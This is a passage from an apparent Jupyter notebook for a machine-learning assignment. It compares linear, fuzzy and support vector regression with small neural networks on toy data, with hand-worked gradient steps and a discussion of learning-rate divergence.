"Break out of the loop and the iteration converge at Iteration= 61 \nThe value of loss is: 8.75025313893184 \nThe value of w1 is: 9.999705441446167 \nThe value of w2 is: 2.5109311582607736\n"
]
],
[
[
"Below gives a plot on how the NN model fit to the current sample data points. ",
"_____no_output_____"
]
],
[
[
"# plot the fit\nx = np.linspace(-4, 10, 100)\ny = w2 * (1 / (1 + np.exp(-(w1 * x + 1)))) + 1\n# plt.close('all')\nplt.plot(x, y, c='red', label='y = f(w2 * a1 + b)')\nplt.title('Fitted line using two-layer NN')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.xlim((-5, 8))\nplt.ylim((-2, 8))\nplt.xlabel('x')\nplt.ylabel('y')\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Q6 Re-do Q1-Q5",
"_____no_output_____"
],
[
"Two additional observations, (2, 3) and (3, 4) are added and below is the scatterplot showing how the data sample looks like. ",
"_____no_output_____"
]
],
[
[
"ar = np.array([[1, 1, 1, 1, 1, 1, 1, 1], # intercept\n [1, 2, 3, 4, 5, 6, 2, 3], # x\n [1, 2, 3, 4, 5, 6, 3, 4]]) # y\n\n# plot the dot points\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.title('Visualization of training observations')\nplt.axis('scaled')\nplt.show()",
"_____no_output_____"
]
],
[
[
"### Simple Linear Regression",
"_____no_output_____"
],
[
"The simple linear regression fit similar to Q1 has been conducted as below. The estimated $slope=0.923$ and estimated $intercept=0.5$.",
"_____no_output_____"
]
],
[
[
"# Data preprocessing\nX_lp = ar[[0, 1], :].T # transpose the array before modeling\ny_lp = ar[2].T\n\n# Define and solve the CVXPY problem.\nbeta = cp.Variable(X_lp.shape[1]) # return num of cols, 2 in total\ncost = cp.sum_squares(X_lp * beta - y_lp) # define cost function\nobj = cp.Minimize(cost) # define objective function\nprob = cp.Problem(obj)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe optimal value of loss is:\", prob.value)\nprint(\"\\nThe estimated of a (slope) is:\", beta.value[1],\n \"\\nThe estimate of b (intercept) is:\", beta.value[0])",
"\nThe optimal value of loss is: 1.3846153846153055\n\nThe estimated of a (slope) is: 0.9230769232893655 \nThe estimate of b (intercept) is: 0.4999999991534938\n"
]
],
[
[
"The regression line has been plotted:",
"_____no_output_____"
]
],
[
[
"# Plot the fit\nx = np.linspace(0, 10, 100)\ny = beta.value[1] * x + beta.value[0]\nplt.close('all')\nplt.plot(x, y, c='red', label='y = ax + b')\nplt.title('Fitted line using simple LR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"_____no_output_____"
]
],
[
[
"### Fuzzy Linear Regression",
"_____no_output_____"
],
[
"The fuzzy linear regression fit similar to Q2 has been conducted as below. We can see that some spread was estimated for the intercept $A0$ because we are unable to fit the data perfectly this time and there will have to be some spread to cover the data points around the regression line. ",
"_____no_output_____"
]
],
[
[
"# Define threshold h (it has same meaning as the alpha in alpha-cut). Higher the h, wider the spread.\nh = 0.5\n# Define and solve the CVXPY problem.\nc = cp.Variable(X_lp.shape[1]) # for spread variables, A0 and A1\nalpha = cp.Variable(X_lp.shape[1]) # for center/core variables, A0 and A1\ncost = cp.sum(X_lp * c) # define cost function\nobj = cp.Minimize(cost) # define objective function\nconstraints = [c >= 0,\n y_lp <= (1 - h) * abs(X_lp) * c + X_lp * alpha, # abs operate on each elements of X_lp\n -y_lp <= (1 - h) * abs(X_lp) * c - X_lp * alpha]\n\nprob = cp.Problem(obj, constraints)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe optimal value of loss is:\", prob.value)\nprint(\"\\nThe center of A1 (slope) is:\", alpha.value[1],\n \"\\nThe spread of A1 (slope) is:\", c.value[1],\n \"\\nThe center of A0 (intercept) is:\", alpha.value[0],\n \"\\nThe spread of A0 (intercept) is:\", c.value[0])",
"\nThe optimal value of loss is: 8.0\n\nThe center of A1 (slope) is: 0.9999999999999999 \nThe spread of A1 (slope) is: 0.0 \nThe center of A0 (intercept) is: 0.5 \nThe spread of A0 (intercept) is: 1.0\n"
]
],
[
[
"The regression line has been plotted, along with the fuzzy spread. ",
"_____no_output_____"
]
],
[
[
"x = np.linspace(0, 10, 100)\ny = alpha.value[1] * x + alpha.value[0]\nplt.close('all')\nplt.plot(x, y, c='red', label='y = A1x + A0')\ny = (alpha.value[1] + c.value[1]) * x + alpha.value[0] + c.value[0]\nplt.plot(x, y, '--g', label='Fuzzy Spread')\ny = (alpha.value[1] - c.value[1]) * x + alpha.value[0] - c.value[0]\nplt.plot(x, y, '--g')\nplt.title('Fitted line using Fuzzy LR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"_____no_output_____"
]
],
[
[
"### Support Vector Regression",
"_____no_output_____"
],
[
"The support vector regression fit similar to Q3 has been conducted as below. Here a simpler version of SVR is used with $\\epsilon$ has been set to 1:\n$$\nminimize \\quad \\frac{1}{2}||w||^2$$\n\n$$\nsubject\\, to=\\left\\{\n\\begin{aligned}\ny_i-(w \\cdot x_i)-b\\le\\epsilon\\\\\n(w \\cdot x_i)-b\\le\\epsilon-y_i\\le\\epsilon\\\\\n\\end{aligned}\n\\right.\n$$\n\nThe fitted line and the hard margin has been plotted above the training set as well. The estimated $w=0.6$ and $b=1.4$.",
"_____no_output_____"
]
],
[
[
"# A simplified version without introducing the slack variables ξi and ξ*i\nepsilon = 1\nbw = cp.Variable(X_lp.shape[1]) # for b and w parameters in SVR. bw[0]=b, bw[1]=w\ncost = 1 / 2 * bw[1] ** 2\nobj = cp.Minimize(cost)\nconstraints = [\n y_lp <= X_lp * bw + epsilon,\n -y_lp <= -(X_lp * bw) + epsilon]\nprob = cp.Problem(obj, constraints)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe estimate of w is:\", bw.value[1],\n \"\\nThe estimate of b is:\", bw.value[0], )\n\nupper = X_lp[:, 1] * bw.value[1] + bw.value[0] + epsilon # upper bound of the margin\nlower = X_lp[:, 1] * bw.value[1] + bw.value[0] - epsilon # lower bound of the margin\nplt.close('all')\nx = np.linspace(.5, 6, 100)\ny = bw.value[1] * x + bw.value[0]\nplt.plot(x, y, c='red', label='y = wx + b')\nx = [[min(X_lp[:, 1]), max(X_lp[:, 1])]]\ny = [[min(lower), max(lower)]]\nfor i in range(len(x)):\n plt.plot(x[i], y[i], '--g')\ny = [[min(upper), max(upper)]]\nfor i in range(len(x)):\n plt.plot(x[i], y[i], '--g', label='margin')\nplt.title('Fitted line using SVR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"\nThe estimate of w is: 0.6000000017139642 \nThe estimate of b is: 1.3999999940011307\n"
]
],
[
[
"### Single-layer NN",
"_____no_output_____"
],
[
"#### First two iterations illustration",
"_____no_output_____"
],
[
"Similar to the Q4, \n**For the 1st iteration**, with initial value $w=10$:\n\n$$\n\\frac{\\partial E}{\\partial a}=a-T=5(wp_i+1)-T_i\\\\\n\\frac{\\partial f}{\\partial x}=5$$\n$$\\frac{\\partial x_1}{\\partial w}=p_1=1$$\n$$\\vdots$$\n$$\\frac{\\partial x_6}{\\partial w}=p_6=6$$\n$$\\frac{\\partial x_7}{\\partial w}=p_7=2$$\n$$\\frac{\\partial x_8}{\\partial w}=p_8=3$$\n\nFor $i=1$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*1+1)-1=54\\\\\n\\frac{\\partial E}{\\partial w}=54*5*1$$\nFor $i=2$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*2+1)-2=103\\\\\n\\frac{\\partial E}{\\partial w}=103*5*2$$\nFor $i=3$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*3+1)-3=152\\\\\n\\frac{\\partial E}{\\partial w}=152*5*3$$\nFor $i=4$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*4+1)-4=201\\\\\n\\frac{\\partial E}{\\partial w}=201*5*4$$\nFor $i=5$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*5+1)-5=250\\\\\n\\frac{\\partial E}{\\partial w}=250*5*5$$\nFor $i=6$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*6+1)-6=299\\\\\n\\frac{\\partial E}{\\partial w}=299*5*6$$\nFor $i=7$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*2+1)-3=102\\\\\n\\frac{\\partial E}{\\partial w}=102*5*2$$\nFor $i=8$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*3+1)-4=151\\\\\n\\frac{\\partial E}{\\partial w}=151*5*3$$\n\n\nThe sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w})=26105\n$$\nAverage the sum of gradient by $N=8$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w})}{N}=326.3125\n$$.",
"_____no_output_____"
],
[
"The new $w$ and output $a$ is calculated:\n$$w=10-326.3125=-316.3125\\\\\na=[-1576.562, -3158.125, -4739.688, -6321.25 , -7902.812, -9484.375, -3158.125, -4739.688]\n$$",
"_____no_output_____"
],
[
"**For the 2nd iteration,** similar steps have been conducted as the 1st iteration and:\n\nThe sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w})=-822307.5\n$$\nAverage the sum of gradient by $N=8$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w})}{N}=-10278.844\n$$",
"_____no_output_____"
],
[
"The new $w$ and output $a$ is calculated:\n$$w=-316.3125-(−10278.844)=9962.531\\\\\na=[49817.656, 99630.312, 149442.969, 199255.625, 249068.281, 298880.938, 99630.312, 149442.969]\n$$",
"_____no_output_____"
],
[
"#### Code",
"_____no_output_____"
],
[
"Similar to Q4, **We can tell from the above that throughout the first 2 iterations, the updated fit $a$ more and more far away from the actual value. This is because of the learning rate=0.1 was set to be too large and cause the result to be oscillating and won't be able to converge.** Further discussion has been made in Q7 to explore for a proper learning rate in this case. \n\nFrom the code below, after 30 iterations the loss function value becomes larger and larger and won't be able to converge, which further proves the findings. ",
"_____no_output_____"
]
],
[
[
"w, a, gradient = single_layer_NN(lr=0.1, w=10, maxiteration=30)",
"Iteration= 0 , Loss value= 131068.0\nIteration= 1 , Loss value= 130036482.140625\nIteration= 2 , Loss value= 129028683663.17578\nIteration= 3 , Loss value= 128028711349045.31\nIteration= 4 , Loss value= 1.2703648883607445e+17\nIteration= 5 , Loss value= 1.2605195604759488e+20\nIteration= 6 , Loss value= 1.2507505338822601e+23\nIteration= 7 , Loss value= 1.2410572172446726e+26\nIteration= 8 , Loss value= 1.2314390238110266e+29\nIteration= 9 , Loss value= 1.2218953713764914e+32\nIteration= 10 , Loss value= 1.2124256822483233e+35\nIteration= 11 , Loss value= 1.2030293832108986e+38\nIteration= 12 , Loss value= 1.193705905491014e+41\nIteration= 13 , Loss value= 1.1844546847234587e+44\nIteration= 14 , Loss value= 1.1752751609168519e+47\nIteration= 15 , Loss value= 1.1661667784197463e+50\nIteration= 16 , Loss value= 1.157128985886993e+53\nIteration= 17 , Loss value= 1.1481612362463688e+56\nIteration= 18 , Loss value= 1.1392629866654596e+59\nIteration= 19 , Loss value= 1.130433698518803e+62\nIteration= 20 , Loss value= 1.121672837355282e+65\nIteration= 21 , Loss value= 1.112979872865779e+68\nIteration= 22 , Loss value= 1.104354278851069e+71\nIteration= 23 , Loss value= 1.0957955331899727e+74\nIteration= 24 , Loss value= 1.0873031178077507e+77\nIteration= 25 , Loss value= 1.0788765186447404e+80\nIteration= 26 , Loss value= 1.0705152256252437e+83\nIteration= 27 , Loss value= 1.0622187326266482e+86\nIteration= 28 , Loss value= 1.0539865374487916e+89\nIteration= 29 , Loss value= 1.0458181417835635e+92\n"
]
],
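[
[
"As a quick numerical sanity check of the hand-computed first iteration above (a short sketch added for verification, reusing the same inputs, targets, $w=10$, bias $b=1$ and learning rate 0.1 from the assignment):",
"_____no_output_____"
]
],
[
[
"import numpy as np\n\n# Verify the hand-computed batch gradient of the single-layer NN at the initial weight\np = np.array([1, 2, 3, 4, 5, 6, 2, 3])  # inputs\nT = np.array([1, 2, 3, 4, 5, 6, 3, 4])  # targets\nw, b = 10.0, 1.0\na = 5 * (w * p + b)  # outputs with the initial weight\ngrad = np.sum((a - T) * 5 * p)  # expected: 26105\nstep = 0.1 * grad / len(p)  # expected: 326.3125\nprint(grad, step, w - step)  # the new w should be -316.3125",
"_____no_output_____"
]
],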
[
[
"### Two-layer NN",
"_____no_output_____"
],
[
"#### First two iterations illustration",
"_____no_output_____"
],
[
"The first two iterations calculation is enoughly similar to the Q5.\n**For the 1st iteration**, \n\n$$\nFor\\quad i=1, 2, 3, 4, 5, 6, \\quad a_1=\\frac{1}{1+e^{-(w_1p_i+1)}}\\approx1\\\\\n$$\n\nFor $i=1:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-1=10\\\\\n\\frac{\\partial E}{\\partial w_2}=10*1*1=10,\\quad \\frac{\\partial E}{\\partial w_1}=10*10*(1-1)*1=0\n$$\nFor $i=2:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-2=9\\\\\n\\frac{\\partial E}{\\partial w_2}=9*1*1=9,\\quad \\frac{\\partial E}{\\partial w_1}=9*10*(1-1)*1=0\n$$\nFor $i=3:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-3=8\\\\\n\\frac{\\partial E}{\\partial w_2}=8*1*1=8,\\quad \\frac{\\partial E}{\\partial w_1}=8*10*(1-1)*1=0\n$$\nFor $i=4:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-4=7\\\\\n\\frac{\\partial E}{\\partial w_2}=7*1*1=7,\\quad \\frac{\\partial E}{\\partial w_1}=7*10*(1-1)*1=0\n$$\nFor $i=5:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-5=6\\\\\n\\frac{\\partial E}{\\partial w_2}=6*1*1=6,\\quad \\frac{\\partial E}{\\partial w_1}=6*10*(1-1)*1=0\n$$\nFor $i=6:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-6=5\\\\\n\\frac{\\partial E}{\\partial w_2}=5*1*1=5,\\quad \\frac{\\partial E}{\\partial w_1}=5*10*(1-1)*1=0\n$$\nFor $i=7:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-3=8\\\\\n\\frac{\\partial E}{\\partial w_2}=8*1*1=8,\\quad \\frac{\\partial E}{\\partial w_1}=5*10*(1-1)*1=0\n$$\nFor $i=8:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-4=7\\\\\n\\frac{\\partial E}{\\partial w_2}=7*1*1=7,\\quad \\frac{\\partial E}{\\partial w_1}=5*10*(1-1)*1=0\n$$",
"_____no_output_____"
],
[
"The sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_1})=0$$\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_2})=10+9+8+7+6+5+8+7=60$$\nAverage the sum of gradient by $N=8$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_1})}{N}=0$$\n\n$$s_2=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_2})}{N}=0.75$$",
"_____no_output_____"
],
[
"The new weight $w_1$, $w_2$ and output $a_1$ and $a_2$ can be calculated. The value of $a_1$ and $a_2$ are both for all 6 observations. \n$$\nw_1=w_1-s_1=10-0=10,\\\\\nw_2=w_2-s_2=10-0.75=9.25\\\\\na_1=\\frac{1}{1+e^{-(w_1p_i+1)}}\\approx1, \\quad i\\in [1,2,3,4,5,6]\\\\\na_2=w_2a_1+b=9.25*1+1=10.25\n$$",
"_____no_output_____"
],
[
"**For the 1st iteration**, similar steps have been conducted as the 1st iteration and:\n\nThe sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_1})=0$$\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_2})=54$$\nAverage the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_1})}{N}=0$$\n\n$$s_2=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_2})}{N}=0.675$$\nThe new weight $w_1$, $w_2$ and output $a_1$ and $a_2$ can be calculated, The value of $a_1$ and $a_2$ are both for all 6 observations:\n$$\nw_1=w_1-s_1=10-0=10,\\\\\nw_2=w_2-s_2=9.25-0.675=8.575\\\\\na_1=\\frac{1}{1+e^{-(w_1p_i+1)}}\\approx1, \\quad i\\in [1,2,3,4,5,6]\\\\\na_2=w_2a_1+b=8.575*1+1=9.575\n$$",
"_____no_output_____"
],
[
"#### Code",
"_____no_output_____"
],
[
"Below is the code to estimate all weights using batch training, with the stopping criteria as change in loss function less than 0.0001. We can tell the iteration stopped at Iteration 62 and $w_1=10$ while $w_2=2.51$. We can tell that the $w_1$ hardly changes throughout the iterations. I did not show the first 60 iteration results since it makes the report wordy. \n\nOne thing we can tell is, comparing to Q5, the fitted $w_1$ and $w_2$ are almost the same even thought we added two more points to the training set. Also a plot has been given to see how well the 2-layer NN model fit to the 8 sample data points. As we see, they are not fitted well. ",
"_____no_output_____"
]
],
[
[
"w1, w2, a1, a2, gradient_1, gradient_2 = linear_activation_NN(C=1, lr=0.1, w1=10, w2=10, maxiteration=100)\n\n# plot the fit\nx = np.linspace(-4, 10, 100)\ny = w2 * (1 / (1 + np.exp(-(w1 * x + 1)))) + 1\n# plt.close('all')\nplt.plot(x, y, c='red', label='y = f(w2 * a1 + b)')\nplt.title('Fitted line using two-layer NN')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.xlim((-5, 8))\nplt.ylim((-2, 8))\nplt.xlabel('x')\nplt.ylabel('y')\nplt.show()",
"Break out of the loop and the iteration converge at Iteration= 62 \nThe value of loss is: 9.000281744024555 \nThe value of w1 is: 9.99977776141952 \nThe value of w2 is: 2.509835868561764\n"
]
],
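[
[
"Again as a numerical sanity check of the two-layer hand calculation above (a short sketch for verification, using the same data, $w_1=w_2=10$ and bias $=1$; since $a_1$ is only approximately 1, the printed sums are approximately 60 and 0):",
"_____no_output_____"
]
],
[
[
"import numpy as np\n\n# Verify the hand-computed first-iteration gradients of the two-layer NN\np = np.array([1, 2, 3, 4, 5, 6, 2, 3])  # inputs\nT = np.array([1, 2, 3, 4, 5, 6, 3, 4])  # targets\nw1, w2, b = 10.0, 10.0, 1.0\na1 = 1 / (1 + np.exp(-(w1 * p + b)))  # hidden output, approximately 1 for every point\na2 = w2 * a1 + b  # network output\nprint(np.sum((a2 - T) * a1))  # gradient w.r.t. w2, approximately 60\nprint(np.sum((a2 - T) * w2 * a1 * (1 - a1) * p))  # gradient w.r.t. w1, approximately 0\nprint(0.1 * np.sum((a2 - T) * a1) / len(p))  # step for w2, approximately 0.75",
"_____no_output_____"
]
],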
[
[
"## Q7 Discussion",
"_____no_output_____"
],
[
"The detailed comments for Q1, Q2, Q3, Q5 and Q6 have been made in each section respectively. Here the convergence issue in Q4 and Q6 (the Single-layer NN) will be discussed. ",
"_____no_output_____"
],
[
"### Discussion of Convergence Issue",
"_____no_output_____"
],
[
"As mentioned in Q4, throughout the first 2 iterations, the updated fit $a$ more and more far away from the actual value. From the code after running 30 iterations, the loss function value becomes larger and larger and won't be able to converge. This is because of the learning rate=0.1 was set to be too large and cause the result to be oscillating and won't be able to converge. In below, the learning rate has been adjusted to 0.001 and the algorithm converged after 23 iterations with loss function value=`14.423`.\n\nThe fit has been plotted against the sample data points. ",
"_____no_output_____"
]
],
[
[
"ar = np.array([[1, 1, 1, 1, 1, 1], # intercept\n [1, 2, 3, 4, 5, 6], # x\n [1, 2, 3, 4, 5, 6]]) # y\n# Data preprocessing\nX_lp = ar[[0, 1], :].T # transpose the array before modeling\ny_lp = ar[2].T\n\n# Learning rate has been adjusted to 0.001\nw, a, gradient = single_layer_NN(lr=0.001, w=10, maxiteration=100)\n\n# plot the fit\nx = np.linspace(0, 10, 100)\ny = 5 * w * x + 5\nplt.close('all')\nplt.plot(x, y, c='red', label='y = f(wx + b)')\nplt.title('Fitted line using single-layer NN')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.show()",
"Iteration= 0 , Loss value= 114465.5\nIteration= 1 , Loss value= 44127.76263888889\nIteration= 2 , Loss value= 17017.205223020348\nIteration= 3 , Loss value= 6567.873882921439\nIteration= 4 , Loss value= 2540.34601692255\nIteration= 5 , Loss value= 987.9997295433596\nIteration= 6 , Loss value= 389.672647492919\nIteration= 7 , Loss value= 159.05703032969262\nIteration= 8 , Loss value= 70.16992413801223\nIteration= 9 , Loss value= 35.90980878104183\nIteration= 10 , Loss value= 22.70479452687343\nIteration= 11 , Loss value= 17.61513269602634\nIteration= 12 , Loss value= 15.653403836536127\nIteration= 13 , Loss value= 14.897286780814902\nIteration= 14 , Loss value= 14.605853538556802\nIteration= 15 , Loss value= 14.493525250164922\nIteration= 16 , Loss value= 14.450230105536656\nIteration= 17 , Loss value= 14.433542683559361\nIteration= 18 , Loss value= 14.427110783293427\nIteration= 19 , Loss value= 14.424631710067663\nIteration= 20 , Loss value= 14.423676190889097\nIteration= 21 , Loss value= 14.42330790128349\nIteration= 22 , Loss value= 14.423165949937408\nBreak out of the loop and end at Iteration= 22 \nThe value of loss is: 14.423111237058341 \nThe value of w is: -0.03059554675295504\n"
]
],
[
[
"The same experiment has been conducted to the convergence issue in Q6 (single-layer NN). As mentioned in Q6, throughout the first 2 iterations, the updated fit $a$ more and more far away from the actual value. From the code after running 30 iterations, the loss function value becomes larger and larger and won't be able to converge. This is because of the learning rate=0.1 was set to be too large and cause the result to be oscillating and won't be able to converge. In below, the learning rate has been adjusted to 0.001 and the algorithm converged after 26 iterations with loss function value=`15.880`.\n\nThe fit has been plotted against the sample data points. ",
"_____no_output_____"
]
],
[
[
"ar = np.array([[1, 1, 1, 1, 1, 1, 1, 1], # intercept\n [1, 2, 3, 4, 5, 6, 2, 3], # x\n [1, 2, 3, 4, 5, 6, 3, 4]]) # y\n# Data preprocessing\nX_lp = ar[[0, 1], :].T # transpose the array before modeling\ny_lp = ar[2].T\n\n# Learning rate has been adjusted to 0.001\nw, a, gradient = single_layer_NN(lr=0.001, w=10, maxiteration=100)\n\n# plot the fit\nx = np.linspace(0, 10, 100)\ny = 5 * w * x + 5\nplt.close('all')\nplt.plot(x, y, c='red', label='y = f(wx + b)')\nplt.title('Fitted line using single-layer NN')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.show()",
"Iteration= 0 , Loss value= 131068.0\nIteration= 1 , Loss value= 59726.50207031248\nIteration= 2 , Loss value= 27221.532076098625\nIteration= 3 , Loss value= 12411.455122484942\nIteration= 4 , Loss value= 5663.613810494699\nIteration= 5 , Loss value= 2589.1286127191474\nIteration= 6 , Loss value= 1188.3162944826613\nIteration= 7 , Loss value= 550.0711819861626\nIteration= 8 , Loss value= 259.27075260494536\nIteration= 9 , Loss value= 126.77480696812822\nIteration= 10 , Loss value= 66.40634173735343\nIteration= 11 , Loss value= 38.900959766581664\nIteration= 12 , Loss value= 26.36882010614876\nIteration= 13 , Loss value= 20.658863973364035\nIteration= 14 , Loss value= 18.05726521036399\nIteration= 15 , Loss value= 16.87191177397209\nIteration= 16 , Loss value= 16.331835114516036\nIteration= 17 , Loss value= 16.085762686551366\nIteration= 18 , Loss value= 15.973645936559972\nIteration= 19 , Loss value= 15.922562742345136\nIteration= 20 , Loss value= 15.899287961980999\nIteration= 21 , Loss value= 15.888683390177597\nIteration= 22 , Loss value= 15.883851682149666\nIteration= 23 , Loss value= 15.881650235179443\nIteration= 24 , Loss value= 15.880647200903631\nIteration= 25 , Loss value= 15.880190193411718\nIteration= 26 , Loss value= 15.879981969373212\nBreak out of the loop and end at Iteration= 26 \nThe value of loss is: 15.87988709729567 \nThe value of w is: -0.04013747016418152\n"
]
],
[
[
"## Q8 Bonus Question",
"_____no_output_____"
],
[
"I attempt to add two points aiming at balancing out the effect of the two additional points added in Q6. The (2,1) and (3,2) have been added. \n\n**All four models (Simple Linear Regression, Fuzzy Linear Regression, Support Vector Regression and Single-layer NN) all lead to the same fitted line and they give the same predictions for x = 1, 2, 3, 4, 5, and 6. The prediction results are y = 1, 2, 3, 4, 5, and 6 respectively.**\n\nThe training observations look like the graph below. ",
"_____no_output_____"
]
],
[
[
"ar = np.array([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1], # intercept\n [1, 2, 3, 4, 5, 6, 2, 3, 2, 3], # x\n [1, 2, 3, 4, 5, 6, 3, 4, 1, 2]]) # y\n# plot the dot points\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.title('Visualization of training observations')\nplt.axis('scaled')\nplt.show()\nX_lp = ar[[0, 1], :].T # transpose the array before modeling\ny_lp = ar[2].T",
"_____no_output_____"
]
],
[
[
"### Simple Linear Regression",
"_____no_output_____"
],
[
"For Simple Linear Regression, the same model in Q1 is used. The estimated a is 1 and b is 0:",
"_____no_output_____"
]
],
[
[
"# Define and solve the CVXPY problem.\nbeta = cp.Variable(X_lp.shape[1]) # return num of cols, 2 in total\ncost = cp.sum_squares(X_lp * beta - y_lp) # define cost function\nobj = cp.Minimize(cost) # define objective function\nprob = cp.Problem(obj)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe optimal value of loss is:\", prob.value)\nprint(\"\\nThe estimated of a (slope) is:\", beta.value[1],\n \"\\nThe estimate of b (intercept) is:\", beta.value[0])\n# Plot the fit\nx = np.linspace(0, 10, 100)\ny = beta.value[1] * x + beta.value[0]\nplt.close('all')\nplt.plot(x, y, c='red', label='y = ax + b')\nplt.title('Fitted line using simple LR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"\nThe optimal value of loss is: 4.000000000000197\n\nThe estimated of a (slope) is: 0.9999999992746318 \nThe estimate of b (intercept) is: 2.732524248538759e-09\n"
]
],
[
[
"### Fuzzy Linear Regression",
"_____no_output_____"
],
[
"For Fuzzy Linear Regression, the same model has been used from Q6. The estimated $A0=0$ with spread=2 and $A1=1$ with spread=0.",
"_____no_output_____"
]
],
[
[
"# Define threshold h (it has same meaning as the alpha in alpha-cut). Higher the h, wider the spread.\nh = 0.5\n# Define and solve the CVXPY problem.\nc = cp.Variable(X_lp.shape[1]) # for spread variables, A0 and A1\nalpha = cp.Variable(X_lp.shape[1]) # for center/core variables, A0 and A1\ncost = cp.sum(X_lp * c) # define cost function\nobj = cp.Minimize(cost) # define objective function\nconstraints = [c >= 0,\n y_lp <= (1 - h) * abs(X_lp) * c + X_lp * alpha, # abs operate on each elements of X_lp\n -y_lp <= (1 - h) * abs(X_lp) * c - X_lp * alpha]\n\nprob = cp.Problem(obj, constraints)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe optimal value of loss is:\", prob.value)\nprint(\"\\nThe center of A1 (slope) is:\", alpha.value[1],\n \"\\nThe spread of A1 (slope) is:\", c.value[1],\n \"\\nThe center of A0 (intercept) is:\", alpha.value[0],\n \"\\nThe spread of A0 (intercept) is:\", c.value[0])\n\n# Plot the FR fit\nx = np.linspace(0, 10, 100)\ny = alpha.value[1] * x + alpha.value[0]\nplt.close('all')\nplt.plot(x, y, c='red', label='y = A1x + A0')\ny = (alpha.value[1] + c.value[1]) * x + alpha.value[0] + c.value[0]\nplt.plot(x, y, '--g', label='Fuzzy Spread')\ny = (alpha.value[1] - c.value[1]) * x + alpha.value[0] - c.value[0]\nplt.plot(x, y, '--g')\nplt.title('Fitted line using Fuzzy LR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"\nThe optimal value of loss is: 20.0\n\nThe center of A1 (slope) is: 1.0 \nThe spread of A1 (slope) is: 0.0 \nThe center of A0 (intercept) is: 0.0 \nThe spread of A0 (intercept) is: 2.0\n"
]
],
[
[
"### Support Vector Regression",
"_____no_output_____"
],
[
"For Support Vector Regression, the same model has been used from Q6 with $\\epsilon$ been set to 1. The estimated $w$ is 1 and $b$ is 0. ",
"_____no_output_____"
]
],
[
[
